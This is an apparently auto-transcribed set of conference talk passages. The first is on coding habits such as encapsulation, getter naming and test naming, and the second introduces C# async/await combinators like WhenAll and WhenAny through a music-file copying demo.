method. You know, what are you going to do, the sprint call that method? Okay? Good luck with that. We'll see you on the other side. So, abstraction. Abstraction is related to something else. Not whiskey, but it would be nice if abstraction were related to whiskey. That's distillation. That's slightly different. What are we talking about? Unencapsulated state. Specifically, the relationship between this idea of abstraction and encapsulation, if we look at what the dictionary has to offer us, enclose something in or is it in a capsule? There's a boundary. You're putting, there's an inside and an outside. You're hiding something and revealing something else. But there's something else. Express the essential feature of something simply. This is abstraction, the essence of something to abstract what is it? What is it really about? What is the idea of the thing? And provide an interface for a piece of software to simplify access for the user. Now, this relates to a usability design concept known as an affordance. A quality of an object or an environment which allows an individual to perform an action. So, a knob affords twisting and perhaps pushing while a cord affords pulling. It affords a particular thing. So, a door that has a pulling thing affords pulling. So, if it has a little sign that says push, that's bad design. That's like a comment slash, slash, push. Yeah? We've talked about comments already. This is noise. If you want the user to push, give them a thing that they cannot pull. It's a very, it's a very simple idea. If you want them to pull, give them a pulling thing. It's very simple. If you want people to use objects in a particular way, then offer them the methods that allow them to do that easily. If you say to people, you can default construct this object, but then you have to call this method and you have to call this other method to properly initialize it, then you've actually missed the opportunity of constructing during a constructor. That's its point. Yeah? The idea is if there is one correct way to construct an object, then offer that as the only correct way. You really want to align the affordances, the usage of the thing with your intended usage. So, let's go have a look at our old friend, the recently used list. Let's go back to that one. And here is a very common implementation. I've re-rendered it here. What we've got is a very common implementation is that somebody will say, I'm just going to use a.NET list. I'm going to use a.NET list and then I'm going to have a property, a get, that's going to return that list. And then the bit that does the clever bit, the add method, because that's got to deal with uniqueness and it's got to deal with putting at the front rather than the back, will provide a method for that. But basically anything else that the user wants to do, they can do through this. And so we see how people use. So they initialize it, they go ahead, that's fine, initialize it. They go in there, they add, hello world, that's great. How many items are there in there? Ah! So, first point of call, we have no count property. There is no way to query the size of a recently used list. So we basically have to go in a bit, go to the items and ask for the count. But it gets fun because now what we can do is having got the items, we can sit there and go, oh, I'm going to add a duplicate string. Now, if you remember what a recently used list is, it holds its items uniquely. You cannot add duplicates, they move. When we go and look at the size again, it turns out that the size is now two. So it holds two duplicate items, which is supposed to be impossible. Well, apparently not. And we can also put nulls in if we want, which we're not allowed to do in the original version, a few slides back. So what we've done here is we've effectively, I mean, everything is private, the word private surrounds the list. But the clue that we have a problem is this message chain or sometimes called a train wreck because you get the dots adding up. Something dot something dot something dot something is a very strong clue that you have, you're revealing far too much internal structure. It's a very strong clue. But we knew this already. There is a piece of, we can actually pick up a piece of advice. Going back to the 1980s, the young Kiefer Sutherland, is anybody watching 24 at the moment? New 24? No? Okay, it'll get to Norway eventually. Kiefer Sutherland goes across London and people have been saying, you know, that's amazing. He managed to get from one side of London to the other in under 10 minutes. The mayor of London needs to hire him to redesign the roads because clearly this guy knows something. But this is one of the 80s vampire movies that preceded all the rubbish vampire movies we've had in the last few years. But people, whenever they think about how they're going to protect themselves from vampires, because I know you do, you wake up at three o'clock in the morning thinking, like, what if a vampire came through the door? I mean, I obviously excuse those who are a bit worried about the zombie apocalypse. I live in the city of Bristol and it turns out that Bristol City Council actually has an action plan for the zombie apocalypse. I think it was drawn up by one very bored council employee one day. But that's why I like living there. You know, you've got that opportunity. But I don't know what our vampire strategy is. And people think, oh, what am I going to do? How am I going to protect myself against vampires? And why didn't that build when I left? But no, really, vampires are more important. How do I protect myself? People come up and they say, oh, right, okay, I'm going to need garlic. Yes, we've got garlic bread in the freezer, so we're good. We're safe. Okay. And what else? Maybe I could drive a stake through their heart. Yeah, but you've got to get close and intimate. Holy water. Right. None of that in the house at the moment. Availability issues. You kind of go through all the standard techniques. Sometimes people misremember, they say things, silver bullets. Oh, you're going to be disappointed. That's werewolves. You've got to get your right undead. You know, wrong class of undead. Sunlight. But does it go as far as ultraviolet light? Some models of vampires say yes. Some models say no. It's difficult to say. But the one everybody forgets, the greatest protection, because you are at home. Do not invite them in. Do not invite them in. To quote the film. If you invite them in across the threshold, they can do anything. What has this got to do with encapsulation? Everything. Absolutely everything. Don't invite them in. Here it is. If you want people to be able to count the number of items in there, then give them a count property. If you want them to be able to do stuff, offer it to them. Your fingers will not fall off through the effort of typing. Okay. But you've also enforced an encapsulation that allows you to actually flip the representation round. This one we insert at the front. This one we just transform it and we insert at the back. From the outside, nothing has changed. From the inside, we've actually reversed the internal data structure. Nobody noticed. That is the magic of what we mean by encapsulation. What we're saying is strictly private. It's not just a case of put a private keyword in front of it. It means really, really private. Now, when I held back from, because sometimes people think, oh yeah, we've got classes with all these kinds of getters and things like that. It's such an item, I gave it its own space. So get. Get. Here it is in the Oxford English dictionary. The Oxford English dictionary is a fantastic dictionary if you are a word geek. And at this point, I confess I'm a word geek. Because it's of no use to you whatsoever if you're trying to find out what the meaning of a word is. Because what you will start off with, it will give you the complete history of the word. Okay? So, you know, the OED basically has everything going back for a thousand or so years. And it will give you all of the roots. As you can see, get is quite an old word. And it's cognate with a whole bunch of stuff in Frisian, Old Norse, and so on. Very useful if you happen to be in this kind, into this kind of thing. I think this is the most interesting bit, to be honest. And then there's all those other definitions and usages. It's very boring. But what I want to draw your attention to is two things. One, if you look at the first column over there, you will see that there are multiple entries for get. If you look over to the other side, you will see that the scroll bar is very, very small. That's because it's proportional to the amount of stuff there is on it. If you print out the definition for get, it comes to somewhere between 30 and 40 pages in the printed dictionary. It's one of the reasons I don't have the printed dictionary. You know, you know, it's, it's, sorry, which rainforest would you like to destroy to print it, sir? No, no, I'm, I'm just going to go and destroy electrons. So, it turns out that get is one of the words in the English language. There are two words in the English language that have the most pages of definition. Get is one of them. Yep, you got it. Sets the other. So, if you wanted to use these words because they're unambiguous and clear and they have a simple, concise, well-defined meaning, bad luck. It turns out there's a third word that's not been fully integrated, all the newer definitions have not been fully integrated into the OED. And this one may also be familiar. This third word is now overtaken both get and set. That word is run, which apparently we use quite a lot. Yeah? So, this is, so these are words that have multiple definitions. So, a very simple one is just, is on the naming. I just think get and set are terrible names. But get in particular, get. When you have a getter, does it have a side effect or does it not have a side effect? The one thing the word should tell me is that it should communicate there is a side effect or is there, there is not a side effect. Is it a pure query or not? Let's look at how the word is used in English. I go to a cache point and I get money from the cache point. Is there a side effect? Yes. Disappointingly, my count balance goes down. You get married. Is there a side effect? Yes. Huge side effect. Life changing. So, the point here is the word get means move from one place to another in such a way that it is no longer available at the first place. That's what it means. That's its principal usage. It does not mean I'm asking you a question. But you see get and set, they're three letters long and they look so nice together. They rhyme. If, yeah, if English were different, we probably wouldn't have this problem. And we think, oh, they're kind of opposites. No, they're not. The opposite of set is reset or unset. These are opposites. So, that's one aspect. One is the name. So, simple example. You know, you end up, oh, yeah, let's create an object. It's going to be, it's going to hold money. It's going to hold currency, details. It's going to be units and hundreds. And then we're going to be able to set them because for every get there is always a set. And that's the problem. We even have IDEs that do this for us. That's great because I can do the wrong thing without having to type. I've got a shortcut for doing the wrong thing. I used to have to type lots to do the wrong thing. But now, there it is, enterprise coding at your fingertips. But we sit there and go, do we really need this? Could we not just, you know, get rid of that? Oh, yeah. And actually we could get rid of the brief. Oh, good grief. Do you see what I did there? I just turned it into object oriented code. I turned it from assembler into object oriented code. That's amazing. So, this is actually the other aspect. The other side of get is unset is not simply that there is a false symmetry. It's not simply the naming sucks. It is that there is this idea that we need to be more cautious and actually more challenging. We need to challenge it. Do we actually need to change this? There are so many reasons why you should not be encouraging state change in your code. So, to the final item, uncohesive tests. Because it turns out if I do, given this talk a few years ago, people weren't writing tests. But these days people are writing tests. Everybody's writing tests. And some people have really got the idea. They really understand it. And other people are just kind of getting their feet wet. Just getting into the idea. And again, the advice varies. There are so many different schools of thought. But the one I want to challenge, first of all, is the idea that we're just writing tests to find out that things don't work. So, this lovely blurb from Nat Price and Steve Freeman. They wrote the book, Growing Object Oriented Software Guided by Tests. But a few years ago they ran this session XP Day in London, XP Day 2007. And the blurb for the session, are your tests really driving your development? Really had a very key point. I think people overlook when they think of TDD as just testing. As they said, everybody knows TDD stands for test driven development. But people too often concentrate on the words test and development and don't consider what the word driven really implies. So, for tests to really drive your development, they must do more than just test the code, performs its functionality. They must clearly express that required functionality. They must be specifications. In other words, don't just simply test that it works. Explain to the reader what you mean by it works. So, if we see this from the point of view of our recently used list, just keep the feature set small here, the most instinctive way that people will go about testing this, the most common approach, the most obvious approach is this. We just test each feature. We've got a constructor, we'll test it. We've got a count, we'll test it. We've got an indexer, we'll test it. We've got an app method, we'll test it. One for one. It's an obvious approach. It is the most common approach and it's completely wrong. It took me years to come to terms with why it was wrong because I started splitting my tests up years ago. But I kind of really thought about it. But when we end up with a much more literate style, actually, I'm going to skip that slide. It's good stuff. But I'm going to skip that slide in the interest of time. If we go back to our recently used list, we can structure it. The idea is that you should be looking at your testing frameworks. And perhaps you have some nice custom extensions to your testing framework. Feel free to use those. But if you're just using a raw testing framework, find out how much of it can be used to express a hierarchical structure as if you were trying to explain to a reader what is going on. Don't tell them that you're testing something. Tell them what you're expecting. Tell them what's required. And use the hierarchical structuring within your language, whether it is namespaces, whether it is nested classes, whether you have some other intermediate construct. If you have a language that has lambdas and a decent way of constructing lookup tables, so maps and the like, then this is a really useful technique. Here is the name of my test. You can even use strings. And then here is the following block of code. You can be very, very expressive. Don't think of it as test methods. You kind of end up with a much more literate approach. So we see that a new list is empty. We're not testing the constructor. We're simply offering the people a statement. We see that a non-empty list is unchanged when the head item is re-added. We see that any list rejects addition of null items. And what's nice about this is when the tests pass, the names reflect the functionality that you have. It is a list of what the thing does. And it all comes up green. If something fails, then it comes up red. And it tells you that this thing you thought you had, you don't. Now, this, by the way, this cuts through all the questions of should I also include the word should or must or something in the test name. The answer is no. Because that doesn't make sense. If I look at the first item, it tells me a new list is empty. That is a feature of this class. A new list is empty. It's not a feature that it should be empty. It is. Really, there's no discussion. Otherwise, it's red. Yeah? So we're list, so we actually get a listing of the functionality. So the test names work in two environments. They work for writing and they work for reading, which is, I think, the most reading after execution. But the real core of this is the uncohesion. What is the problem when we actually have a test case that is named to test a method? Even something simple like a Boolean method that can really return one of two values. True or false? Surely you need at least two test cases for that. So here is this observation. I stopped, I noticed that I stopped using the terminology test case for a few years. This is very strongly associated with J unit. It didn't really get used as much with N unit. But I've gone back in the last year or so to using it because it becomes very clear when you say that a test, if you say that a test methods are test cases, then it's very logical. This test case tests a case. If you have any other answer, then you have a problem. So if you ask somebody, how many test cases, how many cases are you testing in this test case? Always test three different cases. Well, that's not a test case, is it? Yeah, it's great. You can use language on your side. Well, that's three test cases. What are they called? And factor it out accordingly. So a test case should be just that. It should be a case. And on that note, I've only run by two minutes. I'm around all afternoon. Feel free to come and disagree with me. Don't throw rotten fruit at me. Fresh fruit is much appreciated. Though, you know, I'm trying to, I'm doing a bit of a health kick because it's summer. Thank you very much for your time. Thank you.
Habits help you manage the complexity of code. You apply existing skill and knowledge automatically to the detail while focusing on the bigger picture. But because you acquire habits largely by imitation, and rarely question them, how do you know your habits are effective? Many of the habits that programmers have for naming, formatting, commenting and unit testing do not stand up as rational and practical on closer inspection. This talk examines seven coding habits that are not as effective as programmers believe, and suggests alternatives.
10.5446/50615 (DOI)
Everyone hear me? At the back? Wee, good. It's a very full room. I thought I was hidden on the back of this thing and no one would know where I was. And I'd have an easy time. But it's nice of you all to be here. For my first time at NDC and it's so far it's been great. Just out of interest, on the keynote remember there was discussion about a mobile phone being an interface to a bigger device and being a route to it. I'm not checking tweets while I present. I'm using this to control PowerPoint. So a Windows phone can happily control PowerPoint and show you all the speaker notes and allow you to jump around the presentation without worrying about it. While looking at tweets. No, really. So hopefully you all know what we're here for. You've read the abstract. The abstract was copied from an old conference because it suggested you had VS 2012 RC installed. Which is a horrendous thing as I read it this morning when... What a silly thing to leave in. This is specifically there was a white paper when a sinker weight was emerging as a technology in the kind of almost CTP days. Steven Taub from Microsoft wrote a white paper. It was called the Task Asynchronous See Pattern. Task based Asynchronous See Pattern. Or TAP when he wrote a white paper on it. Who knows about that white paper? Wow. So that's good because if you have read it, studied it and implemented it, you need to leave. Because that's what this talk is basically about. But like a lot of white papers people don't read them. They need someone to talk about them or go to them or promote them. Which is a real shame because right now white papers are quite hard and they are quite informative. So what this is about is I hope... Who's used Asynchronous See Pattern weight? That's good because I don't need to go into a long intro. I will do a little bit of intro about what it is. But we're talking about using Asynchronous See Pattern weight to do more than just make your UI responsive. Which is generally where it's kind of sold. If you've written a WinForms app or you've written a WPF app and you want to do some background task, going off to a website, going off to disk, a single weight allows you to have that responsive UI. Your UI doesn't freeze. I've got an ad for the company I work for which I will mention in a second. So who am I? I'm Liam Wesley. I work as an application architect at Huddle. Which is this old start-up in London. I get to work on a bike 6,500km a year. So I no longer fit in skinny jeans. I'll tell you that now. And when I'm not working or commuting, I'm playing. It's my youngest daughter, my eldest and my dad at a farm. I went to Easter. It's great as an idea of entrepreneurship. The farmers on this farm visit, they've decided they would use the plastic tubs they get feed for animals in, shove wheels on them, join them together and drag them around on a bike to run charge you for doing it. I think that's quite cool. So at Huddle, we create a server-based system. So we're all about server, not about UI. That's why this appeals to me more. It's not going to be a UI type talk, although there's a UI to demo. So what is async? A load of people know it. It came in in.NET 4.5. So the aim was we want something that makes a synchronous programming much easier because there was a vision that everyone would be writing in Windows RT. Never mind. So, and that was important because that required this kind of asynchronous operation to be there because the kind of devices they're aiming at, you don't want to stall. You don't want a phone to suddenly go, no, I'm making a call to the network. I'll just stop doing anything on the interface while I go and do it. That's what the old Windows mobile phones used to do. And they locked up regularly. So we don't want that. So it came. Then they brought it out for BCL. So for anyone who can't implement.NET 4.5, and there are servers out there where a tech ops guy will not allow you to put 4.5 on it, you can put it on a.NET 4 server quite happily by using the BCL. So it's a good move. This is something you can back port. Still need VS 2012, but you can put it on an old server that isn't even 4.5, which is quite cool. And that's how they allowed it to go on Windows Phone and Silverlight apps. So the key goals of what Async is there for, and that's it basically. We don't want anything to stall on a background task, a network call, a disk or a IO call. Something like that. Something where, actually, it's not CPU intensive. It's IO intensive. So your processor could happily do stuff. Only it's waiting for the bytes of a disk. And your whole application is grinding to a halt. Now that could be your server-based application that's making multiple requests for data from other services and it's stalling and not giving data back to the user because it's waiting for this IO to complete. In terms of Windows runtime, not Windows RT, they were aiming at anything over 50 milliseconds should be done asynchronously. Which means in the 4.5 framework there's so much more stuff that is asynchronous enabled. Ready for you to use a wait, which is cool. Not everything. Not everything you'd expect, but quite a lot. The other one is there's loads of people out there who really know how to write synchronous code. It'd be nice if it looked like, say, synchronous code. Except we just shimmy in this bit of background processing on the side. And that's with the other goals for a wait, they think. Make the code readable, make it actually go for the business requirement without actually all the cruft that is normally associated with background threads. You don't have to worry about threads. Thread pools, scheduling, when an exception happens. How do I then transfer it back to the thread I was running on? How do I marshal things from a background thread to a UI thread so that a Windows form can be updated for a background thread? All that kind of thing is the aim was to get rid of that so your life was made much easier. So that's the goal for a sink a wait. There's two key words. I keep saying a sink a wait. A sink. You put it on a method and that says, hey, somewhere in the middle of this method, we're going to have a control flow that's going to await something to happen asynchronously in the background. That's it. So if you've used a wait, you might have put it in the middle of a method, and the compiler says, you can't do that. You haven't put the word async on this method. So you put the async on the method. Interestingly, although they were trying to maintain, it's going to be simple. It's going to look like your synchronous code. The moment you start using async away, everything seems to have async written down on the entire call stack because you're going to have to do that because they keep all calling each other. So you are going to have to do some changes. But basically, that async is a flag to the compiler saying this thing is going to await something inside. And then you have a wait, which is what you use that says, hey, I know this is going to take ages. Go off and do it. When it's finished, yell at me. Come back. Tell me you've finished. And then we can carry on. And that allows you to free up all that processing power. So when I get that thing off the network, come back to me and we'll carry on working with it. In the meantime, I can go and do other stuff. I can let the user choose other things on a form, do other stuff. At some point, you're going to have to think in a threaded background processing world of the user can't do everything they might want to do while that background process is happening because at some point you need the result back. So you still have issues that you have to think about, but it's so much easier. So much easier for anyone writing a UI to handle background threading. So that's the basic one. Where you would have had a method in the old synchronous days that returned void, you return task. So they took that from the task parallel library. It was already there. It's really useful because you can do cancellation, you can check progress, you can do all sorts of nice things on the task object. And where you would have had a return value of say int, you return task of type int. And that way you can hand values back from your methods. You might have had a lot of God help me out parameters, which you shouldn't really do. Let's be honest, it's not the nicest thing to do to a person consuming your API. Create a class, create a struct, return that. It's much easier for them to deal with. But if you have output parameters, you really are going to have to now wrap it in a class or a struct and return it as one whole value. It is possible to have an async method that returns void. Let's void. Please, please, please, please, don't do that in your own code. It is there purely to allow it to be used for things like event handlers on forms and such like. You are not meant to implement that. If you implement that, you're saying, I don't care about the poor start, he's going to use this method because I'm not going to tell them anything about it as it progresses. I'm not going to allow them to cancel it, monitor it, anything. And that's the kind of thing that if you were given that API, you'd be cursing the programmer who developed that. So no, no, no two. Voids. So as I said, task T and task, really great. We can find out how they're performing. We can do cancellation. They use the task parallel libraries, cancellation mechanism to easily allow you to cancel tasks all at once. Without you having to run around a little array of tasks, find out all the tasks that you've got, go canceling them down the line, you can just go cancel the whole lot And off it goes. So that's great. So the whole point of this is you're going to be able to concentrate on the business problem and let someone else deal with threading. Right. So that's enough PowerPoint slide where we're going to get to code. As a sample code, I don't know if anyone's seen kind of asynchronous talks before. In general, they'd have gone for maybe a web server. So classic example, I'm going to go to web server. I'm going to give it a geographic location or a postcode, and I want it to look up some data, geo information, tell me which town I'm near, something like that. It's great because it goes off to a web service in the cloud, and it's really good when you give a talk at a conference or a user thing to rely on public Wi-Fi to get your data. It's not. You could all be downloading videos at the moment, and I'd have no access whatsoever. So the other thing is I could do a local web service. So I could have made an IS web service. And that clutters the project up, and you're going, God, this is weird. So instead, what we're going to do is we're going to have some sample data that's simply going to be file copying. That's all we're going to do, which is an IO bound activity on a hard disk. Could be a network call, could be a hard disk operation, could be a SQL operation, but we're doing copies. So we've got sample data, which is not to be used with simple data, which is Mark Rendell's library for accessing databases. Who's also talking at this conference? Now, everyone knows that developers are great at graphic design. I had to adjust this map. I'll tell you now. Does anyone know what this big triangle is? The UK. So we've got the UK here. This is Ireland. That's the Isle of Wight, which has a festival on it. We still own this bit over here as well in the UK. No, I think that's the silly Isles. I think the Fulton Islands is a bit further away. And I had to add this bit in a bit of a hurry last night. So important bit. Obviously, I'm boring. I live in London. And we've come to Oslo. But in Sheffield, there's a band called Silence. Not this isilence. Silence is just pain in the backside and that. But you can go to that web address and you can download a single, a four track single. And the real advantage of this is it's royalty free. I haven't put it in GitHub because all this code is in GitHub because I don't own the copyrights of the music. But you can go and download it for free. And you can download the MP3 file, or the FLAC, or the Oggvorbis, or the AAC files. And that, is our sample data. We are going to muck around with some music tracks with the advantage that when we finish copying music tracks, we can play them. So I'm relying on my taste in music, which is kind of indie guitar. And hopefully it won't be too offensive. It's not rude or anything. It just may be very derivative in your viewpoint. It's not jazz though, so don't worry. So we've got these files, AAC, FLAC, MP3. The important bit about this, if you know about audio formats, I used to work for a digital download company. So we mucked around with transcoding files quite a lot. It's that FLAC files are quite big, because they're lossless. So when you do a FLAC file of a music track, they're 30 megs, 38 megs, for a four minute track. In comparison, the MP3 file is more like 10 megs, 13 megs, that kind of era. When you go to AAC format, which is what iTunes uses, Squish is a lot harder, gets even lower. So it's about half that. The really nice bit about this is if you have files that effectively represent the same data, but are different sizes, then you can do a demo where the first file wins. And that might be the smallest file, because it takes less time to copy. Now, obviously, if anyone musically inclined, those smaller files, they're lossy. They're not as good quality. But the fact that Beats headphones have managed just to sell for billions of dollars to Apple means no one really cares about quality of music. So it's fine. Because I used to have a really old Hi-Fi, and it had a button called loudness, and that's what Beats headphones are, a loudness button on your head. So I've worked in the music industry too much. So yes, so that's our sample data. So the first example we're going to do, in a sink away, in that white paper, there's things called combinator methods, or combinator methods. It's an awful word. But basically, they take a load of stuff you want to do in a bag and throw them at something and do a demo. At the same time. So this is where we're going to get the bonus. So this is when you first looked at a waiter sink. I don't know if anyone's seen when all and when any. And you look at it, and you go, when all? I can see why I'd use that. When any? It's kind of. Once you've read the white paper, you find that when any is the really useful one, and when all is the really dull thing. But when all is useful, because you might want to do everything. And you want to send a load of tasks off, and you need all of them to finish. So just think, sending off emails, sending off a load of national insurance numbers. And you want to batch them, because you know it's going to take time for them all to come back, and you want to get the employee details. So that's when all. So to add to the confirmation that developers can't do design, and I don't do WPF either, you can barely tell that I used to write in VB. It's a Windows form that's gray with lots of tabs and buttons, which is the classic VB type app. But it's the easiest way to show you how it's working, because it has the least amount of code. And we get to play something. We get to put a bit of Albomart over here. We get to use an ActiveX control to play music, even though it's a.NET app. And we've got a little console output, and we've got a button to tell you what to do. And we can just go through all the examples. Behind all this, really simple. When it starts up, it's going to clear out a temporary folder. So we've got a, in that user interface, we'll just run it up, you can see it. We've got a source folder. And that happens to be in my source code for where my apps living. And that's got a load of those sample files. The ones I showed you earlier that were all different sizes, that points to there. This very nicely points to your user area in a temp area, so we're not littering the computer with loads of files all over the place. And all it's going to do is copy from the source folder to the destination folder. That's all its aim is. And just to make sure, it does things like clears all the files from the folder, clears down and sets the temporary folder path so you can override it. It's not very exciting. Every time we run one of these things, we're going to clear the temp folder out. We're going to clear the console so it doesn't have any messages again. And then we're going to kind of clear what was playing on the media player. So we're just resetting the system every time we click the button. So let's do a sample of when all. So first thing we've got to do is get a list of files to copy. All right. We've got some helper methods. I'm not going to type everything out, if you'll be glad to know. So one of the things we're going to do is we're going to go to our source folder, and we're going to recurse through all the folders underneath, and we're going to get all the files that we need to copy, all the AAC, all the FLAC, all the MP3, and all the OG files. But we're also going to get the cover art. And because each of them had its cover art and they're all the same, we're just going to mute that and just take one copy of the cover art so we don't copy it four times. So that's quite simple. We're just going to get a list of all these files to copy. The next thing we're going to do is we're going to say, right, what I want to do is do lots of tasks. So I'm going to create a list of a load of tasks. Remember the task type T? So whatever I'm going to call as my task is going to return a string back. Because that allows me to know when I copy a file, where is it now? Where is the file destination going to be? So I get a string back saying, here's the path to where the file is that I just copied. We're going to create that new list. There. Obviously, it's squiggling to tell me I should have used var. But that's really sharp for you. I've had real flames about using var with people. So for a demo, it makes much more sense to not use var so that people understand where you were coming from. So we are going for every file name, we're going to do something. So we've got that list of file names. And we're going to do something with them. So we're going to go through all of them. And what we're going to do is copy them. Now, you would think if you were going to copy a file using.NET framework, you'd go system.io.file.copy or file.copy. You'd think, great, I'll just go to file.copy and job's done. Make it call the async version of it. If only they'd made an incasync version of file copying. Because they didn't. What they did make was an async version of copying from one stream to another. It's fine. So I kind of understand why they did this. They wanted you to think, if you're going async, block sizes, things like that, if you did a file copy async, what does that mean? That means copy it. Does it mean big blocks, small blocks? There's absolutely zero input. You'd have to start overloading it. The more you overload this stuff, the less it works when it goes to another platform, which has a limited version of.NET framework. So you might as well go to the base classes, wrap it, and make your own little file copy. It doesn't take a long time. It's a bit of Googling, a bit of stack overflow. Job's a good 20-minute job done. So all we're going to do is we take a source path for a file. We're going to copy it to a destination. There's a bit about the UI, progress details, and progress bar controls so that it looks pretty. But basically what we do is we open a source stream with file mode open. We then create, open a destination stream. Just like browsers, when they download, we're going to call it.tmp. We're going to copy it. And this is the important bit. We're doing an await on copy to async. We can do that because we wrote async at the top of our method. And by convention, we wrote async at the end of the method name to let everyone know it was async, even though you've already decorated with async, and they know it's async. There you are. It's in the guidelines, and it is actually quite useful, because when you glance at an object browser, it's really easy to see what's going to go async. And we just copy it 4,096 bytes at a time. And then at the very end, when we're finished copying it, and we've updated our UI, so it looks nice, we're going to rename the file from.tmp to the final file name. Because we finished copying it, successfully copied, we can now give it its original file name. And then we return that file name so that whoever called us knows exactly where the file has been copied to. So that's pretty much it. So the way we do that, we had that list of tasks that we were going to execute. So all we do is we add a new task, which is just the method name, that method that we were going to call. Because it returns, well, it says it returns string, but it's the async modifier, so what it actually returns is a pack of type strings so it all fits into the framework. So we are going to take one of the file names out of the array. That's the first thing we do. We then do a bit of funky stuff with path combine. I don't know if any of you still do string searches for slashes, and you don't. Please use path combine. It does it all for you. It's really wonderful, and it will get you out of a lot of trouble. So what I can do is just say, hey, give me the file name that I had as a source, and shove it on this path. So it says, give me this path, give the file name from that source separate from its path, and join them back together, and now we've got our destination file name. So it's so trivial, it's hard to believe. We aren't doing any fancy UI stuff, so I can set all that to null null true, which are magic values. It should all work. I'm just checking what the squiggle is, probably null reference. There you are, null reference. So what we're going to do is run it. So we can just go await. When all, which is all we were trying to do, was go right. We are going to take all those tasks, all those copies of files that we've carefully built up, because adding them to the list didn't get them going. All it did was say, I now have the potential to run this, and copy a file. You have to give it a kick to make it get going. So we give it a kick, we've run all. Now this actually, handily, returns an array of strings, because it works out. It's a type task string. So every one of these tasks will return a string which represents the file that was copied. So because we've got all of them running, we can just put them all in one string array. Bang, we've got a list of strings. And because we've done that, we can now play a track. So if we have actually copied these files correctly, we can look in the files that are copied, get the first thing, first file name that ends with.mp3, the joys of a US keyboard and an English layout. And the other thing we'll do is do some AlbumArt, because everyone knows that having music with no AlbumArt looks horrible on any UI. Have I got that right? Let's see if it builds. It's hard to believe it's a quad core with 16 gig of RAM. But there you are. So let's run it. Go back to the old-fashioned world. So when all. So we're going to copy all these files. We should see a load of information coming through here in our console window. Let's move it up a bit, and then you can see it. While we're doing that, we'll also just have a look at the folder, not the source folder. I don't want that. So let's simplify it. We've seen where the source files are. Let's have a look in here. Right. So when we run this, we should start seeing files appear here. This is my user's temp area. We'll see files starting to appear. And this will prove that we're actually copying all these files at the same time. So even though we fired them all off with one line of code, we will be copying them in the background. And I've still managed to move the UI around a little bit. They're all temp files, and they gradually all become the real file when they're finished copying. And then eventually, play some music. So that just managed to queue up. Now you can't hear me. That managed to queue up 17 file copies. Actually, more than that, 21 file copies because there were MD5 hash files as well. And just copied them all simultaneously to that folder without me having to think about it. Well, I still have a UI I can play with. I could prove that I have a UI I can play with because if I click that button twice while I'm running it, it will go and break because I've forgotten to disable the button. So async await does not stop you from shooting yourself in the foot, which apparently is an allergy everyone's using today. So my phrase here is, it's a bit dull. It just copies music files, which is all it does. But has anyone written code that can copy 20, 30 files in the background themselves using threads? Was it fun? No. And that came back to the UI and could update the UI and tell you as it went along that it was doing stuff as well, which is a horrible thing to have to do to touch both threads. And you've got synchronization context and background threads and marshalling to do with. So this is not a bad thing at all. So that's a lovely quick win on when all. And you can imagine that there's loads of situations where you want to do multiple things. They submit a report. There's four things to go off to the data, but you can fire them all off. If they're not bound by a transaction, even better. Because obviously if you do a transaction across them, it gets a bit harder to do that kind of multi-threaded type approach. But surely I believe now we may not be. We may be in a world where people use Microsoft Distributed Transaction Coordinator still. However, I'm in a world that's eventually consistent. And I'm quite happy with it being eventually consistent. So I don't mind slightly of things that appear slightly out of order as long as they get there in the end. You can't take that attitude to cooking. If you put the wrong things in at the wrong order in cooking, it tends to bugger up the meal. But in programming, a lot of solutions can be done out of order. It's quite fine. So we go on to another combinator. So we have when any. Now, when any is, hey, I've got a load of stuff. I've got all these things to do. When any of them finish, any, just one, come back and tell me and come back to me. And then I can do shit. I can do stuff. So here you kind of go, the first thing you think is it's a first win. So it's the kind of thing where you say, I've got a post code, go find addresses. I'll use four different services on web services. One of them comes back. That's fine by me. I'll use that as my list of addresses. And I don't care about the others. You might use it in finance for share prices, things like that, when you come back first. You think, eh, eh, it's fine. The advantage is it's much easier to use when there are much better ways of using when any. So these are the patterns that are in Steven Taft's white paper. So seriously, I think when you see that I've used the exact same naming of a constant, that's how much I've lifted Steven Taft's white paper. But there's no point in reinventing that constant and giving it a different name. He gave it the right name to start with. So here we get throttling. Now, people use FTP clients. Who's used FileZilla? How many files can it download at the same time? Does it kind of stop at some point? About eight, maybe 10. You can set it. But normally, you don't actually, your browser doesn't download 500 files at the same time either. It's not normally a great idea to do that. So at some point, you start throttling. So one of the examples we had is we're in a digital media company. The record companies send us raw music files, really good quality, CD quality, WAV files, and we're converting them over. If they send us 10 albums, and they've got 10, 15 tracks each, I could throw 150 MP3 in codes onto an eight-core system. If I do that at the same time with no throttling and no thread control, I tell you now that server's going to fall over. At the very least, when you remote desktop to it to see what's happening, you can't, because there's no CPU to allow you to get on that remote desktop. So loads of systems in life we have to throttle. So let's see how we can do that really easily with the when any construct. So I promise that this will be the last time I code by hand. And then we will use code snippets. But it's good to see how you build up this code and how it kind of uses these metaphors for a list of tasks, all that kind of thing. So we're going to copy a bit from previously anyway. We're going to get that list of file names to copy. Equally, I'm going to do something funky. Is I'm going to sort. Now this is simple, bit of lambda read stuff. Is we're going to sort the file names so that they're in order, so all the track ones come together, all the track 2s come together, all the track 3s, because we had them all in format before. And this allows us to see them being copied in order. We can see the throttling a bit easier. Squiggle, squiggle, squiggle. Looks good. Cultures. Who uses cultures to compare strings? Right. One thing we're going to do is we're going to have a constant. So because we're going to throttle, we're going to have a concurrency level. We're going to say we're only going to do four things at once. We know we had 21 files, but we're only going to do four at a time. And then we'll batch them up. And that allows other things to happen. Someone else may be using my hard drive. Just maybe, especially if it's a server. So we're doing the same kind of thing. We're creating a new task. It's called copy tasks. So you can see how we're building from where we went from where in all differences. We're now going to set a concurrency level. So the thing is we're not going to loop through because we can't loop through. Because we're not going for I'm going to run every file in the system. What we're going to say is I'm going to set up the initial tasks. There may be less than our concurrency level. It could be that it's a sometimes when you get an album from a record company, it could be a single track download. There aren't four things to do in the background. You only have one thing. So we've got to make sure we don't go too far. But otherwise, we're pretty much going to use the same code we did before. The only thing we're going to do that makes it nicer is we're going to have some progress bars because it's nice to see these files just being updated. I remember the days in VB6, where you had indexed controls on web forms and it was much easier to deal with it. And this one I've had to actually do a bit of reflection in jiggery-pokery or select case statement, I think, to get around it, which is a bit of a pain. So that will just mean that while we're copying these four files, you'll see the progress bar go starting, done, starting, done, starting, done. And it makes it much more obvious what's happening on the UI. To give you a feel for how you might actually allow people to see what's happening. But realistically, that's just a setup. So yeah, that looks a bit complex. But what we're doing is preloading four tasks into our collection of tasks. What we're then saying is we're going to start executing. And this is the bit where you kind of go, yeah, this is where, oh, that's how you use when any. That's how you're going to use it. So the thing we're going to play this time, because I wanted 